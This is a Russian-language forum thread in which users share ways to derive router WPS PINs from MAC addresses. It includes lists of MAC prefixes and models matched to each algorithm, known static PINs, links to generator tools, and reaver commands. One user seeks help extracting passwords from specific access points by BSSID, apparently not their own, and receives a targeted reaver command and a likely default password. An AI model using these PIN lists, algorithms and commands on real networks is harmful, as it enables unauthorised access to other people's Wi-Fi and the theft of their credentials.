34:08:04:E1:XX:XX 5C:D9:98:60:XX:XX 5C:D9:98:65:XX:XX
5C:D9:98:66:XX:XX 5C:D9:98:67:XX:XX 84:C9:B2:49:XX:XX
84:C9:B2:4A:XX:XX 84:C9:B2:4C:XX:XX 84:C9:B2:4D:XX:XX
84:C9:B2:4F:XX:XX 84:C9:B2:51:XX:XX 84:C9:B2:52:XX:XX
84:C9:B2:53:XX:XX 84:C9:B2:54:XX:XX 84:C9:B2:57:XX:XX
84:C9:B2:59:XX:XX 84:C9:B2:5A:XX:XX 84:C9:B2:5F:XX:XX
84:C9:B2:62:XX:XX 84:C9:B2:64:XX:XX 84:C9:B2:6C:XX:XX
84:C9:B2:6D:XX:XX B8:A3:86:50:XX:XX B8:A3:86:65:XX:XX
C8:BE:19:70:XX:XX C8:BE:19:71:XX:XX C8:D3:A3:57:XX:XX
C8:D3:A3:5E:XX:XX C8:D3:A3:66:XX:XX CC:B2:55:D5:XX:XX



D-Link firmware: 2.09WW
D-Link firmware: 3.03RU
D-Link DIR-615, firmware: 5.11RU
D-Link DIR-400, firmware: 1.03
D-Link DIR-615, firmware: 3.03RU
D-Link DIR-615, firmware: 5.10
D-Link DIR-615, firmware: 5.10RU
D-Link DIR-615, firmware: 5.11NV
D-Link DIR-615, firmware: 5.11RU
D-Link DIR-615, hardware: B2, firmware: 2.23
D-Link DIR-615, hardware: B2, firmware: 2.25
D-Link DIR-615, hardware: B2, firmware: 2.26
D-Link DIR-615, hardware: B2, firmware: 2.27
D-Link DIR-615, hardware: E4, firmware: 5.11RU
D-Link DIR-628, hardware: A2, firmware: 1.24
D-Link DIR-628, hardware: A2, firmware: 1.25
D-Link DIR-635, hardware: B1, firmware: 2.21
D-Link DIR-635, hardware: B1, firmware: 2.33
D-Link DIR-655, firmware: 2.00
D-Link DIR-655, firmware: 2.00RU
D-Link DIR-655, hardware: A1/A2, firmware: 1.33
D-Link DIR-655, hardware: A2, firmware: 1.35
D-Link DIR-655, hardware: A3, firmware: 1.11
D-Link DIR-655, hardware: A3, firmware: 1.21
D-Link DIR-655, hardware: A3, firmware: 1.35
D-Link DIR-655, hardware: A4, firmware: 1.21
D-Link DIR-655, hardware: A4, firmware: 1.30
D-Link DIR-655, hardware: A4, firmware: 1.32
D-Link DIR-655, hardware: A4, firmware: 1.33
D-Link DIR-655, hardware: A4, firmware: 1.34
D-Link DIR-655, hardware: A4, firmware: 1.35
D-Link DIR-825, firmware: 2.05WW
D-Link DIR-825, firmware: 2.06WW
D-Link DIR-825, firmware: 2.09WW
D-Link DIR-855, hardware: A2, firmware: 1.23
D-Link DIR-855, hardware: A2, firmware: 1.24
D-Link DIR-857, firmware: 1.00
D-Link DIR-857, firmware: 1.01RU

TRENDnet firmware: 1.10
TRENDnet TEW-652BRP, firmware: 1.10
TRENDnet TEW-673GRU, firmware: 1.00

dlink DIR-826L, firmware: 1.00RUb07
dlink DIR-826L, firmware: 1.01RUb01beta01
dlink DIR-826L, firmware: 1.01RUb01beta02
dlink DIR-826L, firmware: 1.01RUb01beta04

Algierd
25.12.2014, 15:39
Мучаю один роутер (D-Link судя по маку), три раза запускал полный перебор и три раза reaver выдавал разные, но близкие результаты (44409845, 44409920, 44410087), когда перебор заканчивается строчки WPS PSK нету. Попытка подключится по пину результатов не принесла. Как можно добить эту точку чтобы вытянуть из неё пароль?

binarymaster
25.12.2014, 15:57
Делаем скрипт выше на калькуляторе!

Имеем BSSID - F8:4A:BF:E1:08:EC

Открываем калькулятор и выбираем вид - программист.

Выбираем HEX. Ставим 4 или 8 байт. Вводим FE108EC.

Выбираем DEC. Жмем кнопку 'Mod' вводим с клавиатуры 10 000 000 (без пробелов) и жмем 'Enter' - Готово!



Это для Huawei? Хм... в сравнении со скриптом, который я постил выше, результаты отличаются, либо я что-то делаю не так



P.S. для BSSID 90:94:E4:F0:3B:F0 с пином 5743984 делаем тоже-самое но с F03BF0!



Это D-Link DIR-620, у него самый обычный алгоритм 16 к 10.

nsin
25.12.2014, 16:12
Алгоритм генерации пин кода, к некоторым роутерам D-Link.

http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/



Скрипт на питоне.

https://github.com/devttys0/wps/blob/master/pingens/dlink/pingen.py

VladimirV
25.12.2014, 16:38
Это для Huawei? Хм... в сравнении со скриптом, который я постил выше, результаты отличаются, либо я что-то делаю не так


Да для них:


48:46:FB:D2:2C:88 83233364 Huawei Technologies HG8245H
D4:6A:A8:C3:58:A4 70199406 Huawei Technologies HG8245H
F8:4A:BF:E1:08:EC 64061245 Huawei Technologies HG8245H

У них по умолчанию пин отключен и показывает 12345670 - заходил на роутер и включал пин.



Это D-Link DIR-620, у него самый обычный алгоритм 16 к 10.



Это тотже алгоритм но в нем используется 24 бита мака, а в Huawei 28 бит!

На паскале это вот-так:


s:= 'FE108EC';
pin:= StrToInt('$'+s);
pin:= pin MOD 10000000;

Этот алгоритм подошел:


ASUS RT-G32
ASUS RT-N13U Rev.B1
D-Link DIR-400, firmware: 1.00
D-Link DIR-400, firmware: 1.03
EDIMAX BR6228GNS
ZyXEL KEENETIC 4G, NDMS v1.00(BWO.0)D0
ZyXEL KEENETIC LITE, NDMS v1.00(BWN.0)D0
EDIMAX BR6258GN
EDIMAX BR6428GN
EDIMAX BR6428NS

VladimirV
25.12.2014, 17:51
Мучаю один роутер (D-Link судя по маку), три раза запускал полный перебор и три раза reaver выдавал разные, но близкие результаты (44409845, 44409920, 44410087), когда перебор заканчивается строчки WPS PSK нету. Попытка подключится по пину результатов не принесла. Как можно добить эту точку чтобы вытянуть из неё пароль?



Вы BSSID или лог выложите. Ато непонятно над чем колдовать.

VladimirV
25.12.2014, 18:25
Нашел скрипт:


Vodafone EasyBox Default WPS PIN Algorithm Weakness
product: EasyBox 802 & EasyBox 803

http://rghost.ru/59969467

Algierd
25.12.2014, 18:44
Вы BSSID или лог выложите. Ато непонятно над чем колдовать.



BSSID: 34:08:04C:5A:18

лог от ривера

https://www.sendspace.com/file/q0cr31

VladimirV
25.12.2014, 18:53
BSSID: 34:08:04C:5A:18

лог от ривера

https://www.sendspace.com/file/q0cr31



ZyXEL KEENETIC, NDMS v1.00(BFW.4)D0

reaver -i mon0 -b 34:08:04C:5A:18 -vv -p4440984 -n

Нашел у себя несколько штук и на всех пароль 123qwe**

Algierd
25.12.2014, 23:39
ZyXEL KEENETIC, NDMS v1.00(BFW.4)D0

reaver -i mon0 -b 34:08:04C:5A:18 -vv -p4440984 -n

Нашел у себя несколько штук и на всех пароль 123qwe**



После перебора на роутере отключился wps, нету пока возможности проверить.

Помогите со второй AP:

ESSID: ZTE018

BSSID: CC:7B:35:15:F5:78

лог ривера:

https://www.sendspace.com/file/chj9yk

Несколько раз делал полный перебор, где-то в начале, но с разных мест, показывает прогресс 90%, потом доходит до 99,99% и так по кругу гоняет один пин... С этим можно что-нибудь сделать чтобы вытянуть пароль?

VladimirV
25.12.2014, 23:43
После перебора на роутере отключился wps, нету пока возможности проверить.

Помогите со второй AP:

ESSID: ZTE018

BSSID: CC:7B:35:15:F5:78

лог ривера:

https://www.sendspace.com/file/chj9yk

Несколько раз делал полный перебор, где-то в начале, но с разных мест, показывает прогресс 90%, потом доходит до 99,99% и так по кругу гоняет один пин... С этим можно что-нибудь сделать чтобы вытянуть пароль?



С этим помочь не могу.

А с предыдущим попробуйте:

reaver -i mon0 -b 34:08:04C:5A:18 -vv -p4440984 -n -L

Algierd
25.12.2014, 23:58
С этим помочь не могу.

А с предыдущим попробуйте:

reaver -i mon0 -b 34:08:04C:5A:18 -vv -p4440984 -n -L



Не ассоциируется, пропал wps.

VladimirV
26.12.2014, 01:35
Вот написал генератор:

Пин генерируется без контрольной суммы!

http://i68.fastpic.ru/big/2014/1226/f5/2fd9bccb77ccfdbf2371e19b54dc11f5.gif

http://rghost.ru/private/59981204/f8afbed5e8764358c761a39185edd36d

PASS- ник

henri2002
26.12.2014, 02:21
Вот написал генератор:

Нули перед пином до 7 знаков подставите Сами (если необходимо). Пин генерируется без контрольной суммы!

http://i63.fastpic.ru/big/2014/1226/66/1ab07f4dcc943f164f95dd7582917366.gif

http://rghost.ru/59977464

PASS- ник



BC:F6:85:CB:6F:7A

BCF685CB6F7A

wsp pin: '69475221'

wpa psk: '*'

ap ssid: '*'

D-Link DIR-615

алгоритм не сработал, а за софт спасибо.

з.ы.

есть вопрос или просьба, собрать в отдельной теме или посте все известные алгоритмы генерации впс из мака.

VladimirV
26.12.2014, 11:25
Выше я приводил совпадения для алгоритма D-Link. Так вот в нем я увеличивал BSSID на 1.

А вот совпадения по тому-же алгоритму но BSSID не увеличивал:


D-Link DIR-651
D-Link DAP-1155, hardware: A1, firmware: 1.00
D-Link DAP-1155, hardware: A1, firmware: ver1.00
D-Link DAP-1360, hardware: B1, firmware: 2.11
D-Link DAP-1360, hardware: B1, firmware: 2.13
TRENDnet TEW-432BRP
TRENDnet TEW-651BR
TRENDnet TEW-652BRP
TRENDnet TEW-731BR



00:14:D1:23:XX:XX 00:14:D1:52:XX:XX 00:14:D1:6D:XX:XX
00:14:D1:6E:XX:XX 00:14:D1:A4:XX:XX 00:14:D1:A9:XX:XX
00:14:D1:AC:XX:XX 00:14:D1:B6:XX:XX 00:14:D1:B7:XX:XX
00:14:D1:B8:XX:XX 00:14:D1:B9:XX:XX 00:14:D1:BC:XX:XX
00:14:D1:BD:XX:XX 00:14:D1:BE:XX:XX 00:14:D1:D1:XX:XX
00:14:D1:D4:XX:XX 00:14:D1:D5:XX:XX 00:14:D1:D7:XX:XX
00:14:D1:D8:XX:XX 00:14:D1:D9:XX:XX 00:14:D1:E0:XX:XX
00:14:D1:E2:XX:XX 00:18:E7:BE:XX:XX 1C:7E:E5:23:XX:XX
28:10:7B:B7:XX:XX 28:10:7B:C2:XX:XX 84:C9:B2:37:XX:XX
84:C9:B2:42:XX:XX 84:C9:B2:5C:XX:XX B8:A3:86:4A:XX:XX
B8:A3:86:51:XX:XX B8:A3:86:53:XX:XX B8:A3:86:70:XX:XX
B8:A3:86:84:XX:XX CC:B2:55:B1:XX:XX D8:EB:97:10:XX:XX
D8:EB:97:12:XX:XX D8:EB:97:13:XX:XX D8:EB:97:14:XX:XX
D8:EB:97:1F:XX:XX FC:75:16:64:XX:XX

Добавил BSSID+0 в генератор и обновил ссылку.

TOX1C
26.12.2014, 14:01
Выше я приводил совпадения для алгоритма D-Link. Так вот в нем я увеличивал BSSID на 1.



dir-615 ревизии Е4, подобрался правильный пин в поле essid+1



есть вопрос или просьба, собрать в отдельной теме или посте все известные алгоритмы генерации впс из мака.



Двачую, и ещё бы неплохо впилить в программу эти алгоритмы, попутно приписав, к какому роутеру что использовать. Ну и в прогу добавить сканер сетей, сделать из нее продвинутое подобие dumpper. А ещё круче - переписать софт под андроид, заместо малофункционального WPSPIN. Цены программе не будет.

binarymaster
26.12.2014, 16:05
Обнаружил, что некоторые ASUS используют алгоритм NIC-32, т.е. последние 32 бита мак адреса (BSSID).

Например:

50:46:[5D:12:34:56] = 1474134[0]

Конкретные названия моделей уточнить пока не могу, т.к. в своей базе их не храню, а надо бы...

VladimirV
26.12.2014, 17:59
Обнаружил, что некоторые ASUS используют алгоритм NIC-32, т.е. последние 32 бита мак адреса (BSSID).

Например:

50:46:[5D:12:34:56] = 1474134[0]

Конкретные названия моделей уточнить пока не могу, т.к. в своей базе их не храню, а надо бы...


Вот что я нашел:


ASUS RT-N13U Rev.B1
D-Link DIR-300
EDIMAX BR6428GN
EDIMAX BR6428NS



00:07:26:3E:XX:XX 00:07:26:41:XX:XX 00:07:26:4A:XX:XX
00:07:26:5F:XX:XX 00:1F:1F:EE:XX:XX 00:1F:1F:F8:XX:XX
10:BF:48:4A:XX:XX 10:BF:48:4B:XX:XX 2C:AB:25:0B:XX:XX
2C:AB:25:0F:XX:XX 2C:AB:25:3D:XX:XX 2C:AB:25:54:XX:XX
2C:AB:25:55:XX:XX 2C:AB:25:57:XX:XX 2C:AB:25:5A:XX:XX
2C:AB:25:5D:XX:XX 2C:AB:25:61:XX:XX 2C:AB:25:68:XX:XX
2C:AB:25:69:XX:XX 2C:AB:25:F8:XX:XX 2C:AB:25:FD:XX:XX
50:46:5D:A5:XX:XX 50:46:5D:AE:XX:XX 50:46:5D:AF:XX:XX
50:46:5D:B0:XX:XX

4pips
26.12.2014, 18:10
Действительно, в моделях ASUS RT-N13U Rev.B1 встречается как классический перевод NIC из 16 в 10 систему, так и перевод последних четырех пар из мак-адреса (NIC+последняя пара от OUI). В других моделях Асус (в своих данных) больше такого подхода не нашел.

Мак-адреса, в которых обнаружен такой подход, начинаются с

10:BF:48

14A:E9

30:85:A9

50:46:5D

F4:6D:04

Причем у них могут встречаться и произвольно заданные пины (не по правилу).

VladimirV
26.12.2014, 18:30
Действительно, в моделях ASUS RT-N13U Rev.B1 встречается как классический перевод NIC из 16 в 10 систему, так и перевод последних четырех пар из мак-адреса (NIC+последняя пара от OUI).



Это потому что если последняя пара от UOI > 0F то подходит 32 бита, если UOI

4pips
26.12.2014, 18:48
Вот еще начала мак-адресов у моделей ASUS RT-N13U Rev.B1

20:CF:30 - только NIC 16->10, а не OUI(2)+NIC

C8:60:00 - тут у OUI последние 00, так что методы совпадают

E0:CB:4E - только NIC 16->10

binarymaster
26.12.2014, 19:33
Да, кстати по поводу ASUS'ов.

Vikhedgehog давно постил здесь ссылку на хабр, где были намёки на WPS пин код и переменную secret_code в NVRAM.

Выяснил, что секретный код и есть WPS пин (переменные wsc_device_pin и secret_code одинаковы).

Причём, при инициализации прошивки секретный код считывается из /dev/mtd0, следовательно этот код задают на производстве роутера. О том, каким образом он генерируется, остаётся только гадать.

TOX1C
26.12.2014, 19:46
А ннасчет тп-линков кто-нибудь знает, что и как там генерируется? У них пин-код прошит на флешке ещё при производстве, но может в прошивке где-то лежит алгоритм.

binarymaster
26.12.2014, 20:02
TP-Link'и могут сами генерировать пин код при сбросе настроек. Не знаю, насколько он рандомный, но знаю точно, что он менялся на одном и том же роутере.

Кстати, так получилось, что я вдохновился одновременно с пользователем VladimirV, и тоже написал свой WPS PIN генератор

сцылкО (пароль - название форума)

Использует 14 алгоритмов генерации + 6 статичных пинов. Также умеет "подсказывать" PIN по OUI мак адреса.

Планирую интегрировать эту штуку в Router Scan, чтобы ещё можно было автоматом находить используемые алгоритмы генерации пина разными моделями роутеров.

UPD:

Добавил часто встречающиеся пины из поста ниже, спасибо!

UPD 2:

Добавил ещё OUI для Huawei, и ещё несколько улучшений.

VladimirV
26.12.2014, 20:30
Вот постаянные пины которые мне известны:


=0000000 =1086411 =1110582
=1227918 =1234567 =1416980
=1562469 =1708421 =1883648
=2017252 =2085483 =2138203
=3195719 =3561153 =3786522
=3887260 =4626484 =6232714
=6817554 =7622990 =9566146
=9995604

В файлике BSSID PIN Model

http://rghost.ru/private/59989004/f8575c09a318f17404e8711a75625da8

vedemur
26.12.2014, 20:55
сцылкО (пароль - название форума)

ничего не получается, ведь название форума Уязвимость в протоколе Wi-Fi Protected Setup или я не прав.

vedemur
26.12.2014, 21:01
спасибо

vedemur
26.12.2014, 21:05
ввёл, открылось пустое поле

henri2002
26.12.2014, 21:11
сцылкО (пароль - название форума)

ничего не получается, ведь название форума Уязвимость в протоколе Wi-Fi Protected Setup или я не прав.



не большая подсказка, в пароле 8-мь знаков.

VladimirV
26.12.2014, 21:15
to binarymaster

По моему все что я находил раньше HEX24->DEC-2465792 попадает под 32, 28, 24 бита.

vedemur
26.12.2014, 21:19
добавлял и точку, и тире, по англ и есть 8 знаков. не пойму

ivann
26.12.2014, 21:25
vedemur в лс глянь 10мин назад

binarymaster
26.12.2014, 21:28
сцылкО (пароль - название форума)

ничего не получается, ведь название форума Уязвимость в протоколе Wi-Fi Protected Setup или я не прав.

ввёл, открылось пустое поле

добавлял и точку, и тире, по англ и есть 8 знаков. не пойму



Facepalm Название форума и название темы - разные вещи



to binarymaster

По моему все что я находил раньше HEX24->DEC-2465792 попадает под 32, 28, 24 бита.



Хм... возможно, но пин всё-таки разный генерируется (если брать в пример 01:23:45:67:89:AB).

UPD:

Да, думаю вы правы. Используется либо 28, либо 32 бита (но не известно точно, т.к. старшие октеты нули).

vedemur
26.12.2014, 21:30
я новичок здесь и что такое лс не знаю, извините

binarymaster
26.12.2014, 21:46
я новичок здесь и что такое лс не знаю, извините



Я даже не знаю, что вы тут делаете, если этого не знаете

Разгадка есть тут, в самом низу сообщения.

VladimirV
26.12.2014, 22:00
to binarymaster

Huawei EchoLife HG532e в программке не определяется (24bit HEX->DEC)


00:66:4B:23:XX:XX 00:66:4B:28:XX:XX EC:CB:30:BC:XX:XX
00:66:4B:29:XX:XX 00:66:4B:2A:XX:XX 00:66:4B:37:XX:XX
00:66:4B:38:XX:XX 00:66:4B:39:XX:XX 00:66:4B:3A:XX:XX
00:66:4B:D0:XX:XX 00:66:4B:D4:XX:XX 00:66:4B:D5:XX:XX
00:66:4B:E4:XX:XX 00:66:4B:E5:XX:XX 00:66:4B:E6:XX:XX
00:66:4B:E8:XX:XX 08:7A:4C:0B:XX:XX 08:7A:4C:0C:XX:XX
08:7A:4C:0D:XX:XX 08:7A:4C:21:XX:XX 08:7A:4C:22:XX:XX
08:7A:4C:24:XX:XX 08:7A:4C:25:XX:XX 14:B9:68:EA:XX:XX
14:B9:68:EB:XX:XX 14:B9:68:EC:XX:XX 14:B9:68:ED:XX:XX
14:B9:68:EE:XX:XX 14:B9:68:EF:XX:XX 20:08:ED:77:XX:XX
20:08:ED:78:XX:XX 20:08:ED:8F:XX:XX 20:08:ED:98:XX:XX
20:08:ED:99:XX:XX 20:08:ED:9A:XX:XX 4C:ED:DE:02:XX:XX
78:6A:89:F3:XX:XX 78:6A:89:F4:XX:XX 78:6A:89:F5:XX:XX
78:6A:89:F7:XX:XX 88:E3:AB:01:XX:XX 88:E3:AB:02:XX:XX
88:E3:AB:07:XX:XX 88:E3:AB:08:XX:XX 88:E3:AB:09:XX:XX
88:E3:AB:0A:XX:XX 88:E3:AB:0B:XX:XX D4:6E:5C:3E:XX:XX
D4:6E:5C:48:XX:XX D4:6E:5C:55:XX:XX D4:6E:5C:56:XX:XX
D4:6E:5C:5C:XX:XX D4:6E:5C:5D:XX:XX D4:6E:5C:66:XX:XX
EC:23:3D:B1:XX:XX EC:23:3D:B2:XX:XX EC:23:3D:B4:XX:XX
EC:23:3D:B6:XX:XX EC:23:3D:B7:XX:XX EC:23:3D:B9:XX:XX
EC:23:3D:BA:XX:XX EC:23:3D:BB:XX:XX EC:23:3D:BC:XX:XX
EC:23:3D:BE:XX:XX EC:23:3D:C0:XX:XX EC:23:3D:C1:XX:XX
EC:23:3D:C2:XX:XX EC:23:3D:C3:XX:XX EC:23:3D:C4:XX:XX
EC:23:3D:C6:XX:XX EC:23:3D:C7:XX:XX EC:23:3D:C8:XX:XX
EC:23:3D:C9:XX:XX EC:23:3D:CB:XX:XX EC:23:3D:CC:XX:XX
EC:23:3D:CD:XX:XX EC:23:3D:D5:XX:XX EC:23:3D:D7:XX:XX
EC:23:3D:DC:XX:XX EC:23:3D:DD:XX:XX EC:23:3D:DE:XX:XX
EC:23:3D:E3:XX:XX EC:CB:30:0A:XX:XX EC:CB:30:BB:XX:XX

vedemur
26.12.2014, 22:07
наверное что-то блокирует, т.к. не скачивается-пустая страница.

vedemur
26.12.2014, 22:12
поршу извинения, я забыл дать разрешение в NoScript, скачал.

Algierd
26.12.2014, 23:01
А вот есть ли какой-то список маков всех роутеров которые используют генерацию пина по методу 16>10 ?

asdm
26.12.2014, 23:16
Обнаружил, что некоторые ASUS используют алгоритм NIC-32, т.е. последние 32 бита мак адреса (BSSID).



есть asus rt-n12 c1

bssid:50:46:5D:61:C1:58

известный pin:42805878

к соожалению,метод не сработал...хотя,может так только в моем случае

henri2002
26.12.2014, 23:33
А вот есть ли какой-то список маков всех роутеров которые используют генерацию пина по методу 16>10 ?



такая инфа есть в программе от binarymaster-а

henri2002
26.12.2014, 23:42
статический Pin = 9995604 так же имеет роутер TOTOLINK N300RT, TOTOLINK N150RT

с маками 78:44:76:xx:xx:xx

TOX1C
26.12.2014, 23:48
Кидаю вам логи роутер скана, заботливо собранные за несколько месяцев. Там всякие разные роутеры, думаю для анализа сгодится.

ссылочка